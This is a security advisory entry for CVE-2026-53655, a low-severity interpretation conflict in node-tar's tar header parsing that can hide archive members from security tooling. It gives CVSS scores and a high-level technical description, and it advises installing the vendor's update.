Interpretation Conflict in node-tar - CVE-2026-53655
Published: June 26, 2026
Vulnerability identifier: #VU135505
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear
CVE-ID: CVE-2026-53655
CWE-ID: CWE-436
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vendor: isaacs
Affected software:
node-tar
node-tar
Detailed vulnerability description
The vulnerability allows a remote attacker to hide archive members from security tooling or downstream processing.
The vulnerability exists due to interpretation conflict in Header.decode in node-tar's tar parser when parsing an attacker-supplied tar archive containing a PAX extended header before intermediary GNU long-name or long-link headers. A remote attacker can supply a specially crafted archive to hide archive members from security tooling or downstream processing.
The issue occurs because PAX overrides such as size are applied to intermediary metadata headers, which can desynchronize parsing and cause different tar implementations to report different archive contents.
How to mitigate CVE-2026-53655
Install security update from vendor's website.